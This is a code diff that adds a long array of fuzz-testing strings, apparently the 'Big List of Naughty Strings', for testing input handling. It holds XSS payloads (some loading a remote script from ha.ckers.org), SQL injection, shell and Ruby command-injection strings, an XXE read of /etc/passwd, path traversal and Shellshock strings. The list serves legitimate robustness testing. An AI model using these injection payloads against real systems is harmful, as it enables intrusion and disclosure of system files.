+ "\"`'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>", "\"`'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>",
+ "\"`'><script>\\x0Cjavascript:alert(1)</script>", "\"`'><script>\\x2Bjavascript:alert(1)</script>",
+ "\"`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>", "\"`'><script>-javascript:alert(1)</script>",
+ "\"`'><script>\\x0Ajavascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>",
+ "\"`'><script>\\x7Ejavascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x87javascript:alert(1)</script>",
+ "\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>",
+ "\"`'><script>\\xC2\\x85javascript:alert(1)</script>", "\"`'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>",
+ "\"`'><script>\\xE2\\x80\\x83javascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>",
+ "\"`'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x80javascript:alert(1)</script>",
+ "\"`'><script>\\x21javascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x82javascript:alert(1)</script>",
+ "\"`'><script>\\xE2\\x80\\x86javascript:alert(1)</script>", 
"\"`'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>",
+ "\"`'><script>\\x0Bjavascript:alert(1)</script>", "\"`'><script>\\x20javascript:alert(1)</script>", "\"`'><script>\\xC2\\xA0javascript:alert(1)</script>",
+ "<img \\x00src=x onerror=\"alert(1)\">", "<img \\x47src=x onerror=\"javascript:alert(1)\">", "<img \\x11src=x onerror=\"javascript:alert(1)\">",
+ "<img \\x12src=x onerror=\"javascript:alert(1)\">", "<img\\x47src=x onerror=\"javascript:alert(1)\">", "<img\\x10src=x onerror=\"javascript:alert(1)\">",
+ "<img\\x13src=x onerror=\"javascript:alert(1)\">", "<img\\x32src=x onerror=\"javascript:alert(1)\">", "<img\\x47src=x onerror=\"javascript:alert(1)\">",
+ "<img\\x11src=x onerror=\"javascript:alert(1)\">", "<img \\x47src=x onerror=\"javascript:alert(1)\">", "<img \\x34src=x onerror=\"javascript:alert(1)\">",
+ "<img \\x39src=x onerror=\"javascript:alert(1)\">", "<img \\x00src=x onerror=\"javascript:alert(1)\">", "<img src\\x09=x onerror=\"javascript:alert(1)\">",
+ "<img src\\x10=x onerror=\"javascript:alert(1)\">", "<img src\\x13=x onerror=\"javascript:alert(1)\">", "<img src\\x32=x onerror=\"javascript:alert(1)\">",
+ "<img src\\x12=x onerror=\"javascript:alert(1)\">", "<img src\\x11=x onerror=\"javascript:alert(1)\">", "<img src\\x00=x onerror=\"javascript:alert(1)\">",
+ "<img src\\x47=x onerror=\"javascript:alert(1)\">", "<img src=x\\x09onerror=\"javascript:alert(1)\">", "<img src=x\\x10onerror=\"javascript:alert(1)\">",
+ "<img src=x\\x11onerror=\"javascript:alert(1)\">", "<img src=x\\x12onerror=\"javascript:alert(1)\">", "<img src=x\\x13onerror=\"javascript:alert(1)\">",
+ "<img[a][b][c]src[d]=x[e]onerror=[f]\"alert(1)\">", "<img src=x onerror=\\x09\"javascript:alert(1)\">", "<img src=x onerror=\\x10\"javascript:alert(1)\">",
+ "<img src=x onerror=\\x11\"javascript:alert(1)\">", "<img src=x onerror=\\x12\"javascript:alert(1)\">", "<img src=x onerror=\\x32\"javascript:alert(1)\">",
+ "<img src=x onerror=\\x00\"javascript:alert(1)\">", "<a 
href=javascript:javascript:alert(1)>XXX</a>", + "<img src=\"x` `<script>javascript:alert(1)</script>\"` `>", "<img src onerror /\" '\"= alt=javascript:alert(1)//\">", + "<title onpropertychange=javascript:alert(1)></title><title title=>", + "<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(1)></a>\">", "<!--[if]><script>javascript:alert(1)</script -->", + "<!--[if<img src=x onerror=javascript:alert(1)//]> -->", "<script src=\"/\%(jscript)s\"></script>", "<script src=\"\\%(jscript)s\"></script>", + "<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">", "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>", "<IMG SRC=# onmouseover=\"alert('xxs')\">", + "<IMG SRC= onmouseover=\"alert('xxs')\">", "<IMG onmouseover=\"alert('xxs')\">", + "<IMG SRC=javascript:alert('XSS')>", + "<IMG " + "SRC=javascript:alert&#" + "0000040'XSS')>", + "<IMG SRC=javascript:alert('XSS')>", + "<IMG SRC=\"jav ascript:alert('XSS');\">", "<IMG SRC=\"jav	ascript:alert('XSS');\">", "<IMG SRC=\"jav
ascript:alert('XSS');\">", + "<IMG SRC=\"jav
ascript:alert('XSS');\">", "perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out",
+ "<IMG SRC=\"  javascript:alert('XSS');\">", "<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
+ "<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>", "<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<<SCRIPT>alert(\"XSS\");//<</SCRIPT>",
+ "<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >", "<SCRIPT SRC=//ha.ckers.org/.j>", "<IMG SRC=\"javascript:alert('XSS')\"",
+ "<iframe src=http://ha.ckers.org/scriptlet.html <", "\\\";alert('XSS');//", "<u oncopy=alert()> Copy me</u>", "<i onwheel=alert(1)> Scroll over me </i>",
+ "<plaintext>", "http://a/%%30%30", "</textarea><script>alert(123)</script>",
+
+ // SQL Injection
+ //
+ // Strings which can cause a SQL injection if inputs are not sanitized
+
+ "1;DROP TABLE users", "1'; DROP TABLE users-- 1", "' OR 1=1 -- 1", "' OR '1'='1", " ", "%", "_",
+
+ // Server Code Injection
+ //
+ // Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)
+
+ "-", "--", "--version", "--help", "$USER", "/dev/null; touch /tmp/blns.fail ; echo", "`touch /tmp/blns.fail`", "$(touch /tmp/blns.fail)",
+ "@{[system \"touch /tmp/blns.fail\"]}",
+
+ // Command Injection (Ruby)
+ //
+ // Strings which can call system commands within Ruby/Rails applications
+
+ "eval(\"puts 'hello world'\")", "System(\"ls -al /\")", "`ls -al /`", "Kernel.exec(\"ls -al /\")", "Kernel.exit(1)", "%x('ls -al /')",
+
+ // XXE Injection (XML)
+ //
+ // String which can reveal system files when parsed by a badly configured XML parser
+
+ "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>",
+
+ // Unwanted Interpolation
+ //
+ // Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or
+ //shell eval. 
Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.
+
+ "$HOME", "$ENV{'HOME'}", "%d", "%s", "{0}", "%*.*s", "File:///",
+
+ // File Inclusion
+ //
+ // Strings which can cause user to pull in files that should not be a part of a web server
+
+ "../../../../../../../../../../../etc/passwd%00", "../../../../../../../../../../../etc/hosts",
+
+ // Known CVEs and Vulnerabilities
+ //
+ // Strings that test for known vulnerabilities
+
+ "() { 0; }; touch /tmp/blns.shellshock1.fail;", "() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }", "<<< %s(un='%s') = %u", "+++ATH0",
+
+ // MSDOS/Windows Special Filenames
+ //
+ // Strings which are reserved characters in MSDOS/Windows
+
+ "CON", "PRN", "AUX", "CLOCK$", "NUL", "A:", "ZZ:", "COM1", "LPT1", "LPT2", "LPT3", "COM2", "COM3", "COM4",
+
+ // IRC specific strings
+ //
+ // Strings that may occur on IRC clients that make security products freak out
+
+ "DCC SEND STARTKEYLOGGER 0 0 0",
+
+ // Scunthorpe Problem
+ //
+ // Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)
+
+ "Scunthorpe General Hospital", "Penistone Community Church", "Lightwater Country Park", "Jimmy Clitheroe", "Horniman Museum", "shitake mushrooms",
+ "RomansInSussex.co.uk", "http://www.cum.qc.ca/", "Craig Cockburn, Software Specialist", "Linda Callahan", "Dr. Herman I. Libshitz", "magna cum laude",
+ "Super Bowl XXX", "medieval erection of parapets", "evaluate", "mocha", "expression", "Arsenal canal", "classic", "Tyson Gay", "Dick Van Dyke", "basement",
+
+ // Human injection
+ //
+ // Strings which may cause human to reinterpret worldview
+
+ "If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your "
+ "dream, but we hope it works. 
Please wake up, we miss you.", + + // Terminal escape codes + // + // Strings which punish the fools who use cat/type on this file + + "Roses are [0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue", "But now...[20Cfor my greatest trick...[8m", + "The quick brown fox... [Beeeep]", + + // iOS Vulnerabilities + // + // Strings which crashed iMessage in various versions of iOS + + "Powerトマトマᄉムᄄマトマトᄉムᄄマᄆᄆヒ ¢ᆬᆪ ¢ᆬᆪh ¢ᆬᆪ " + "¢ᆬᆪ¥ニラ", + "゚マᄈ0゚フネᄌマ"};
\ No newline at end of file |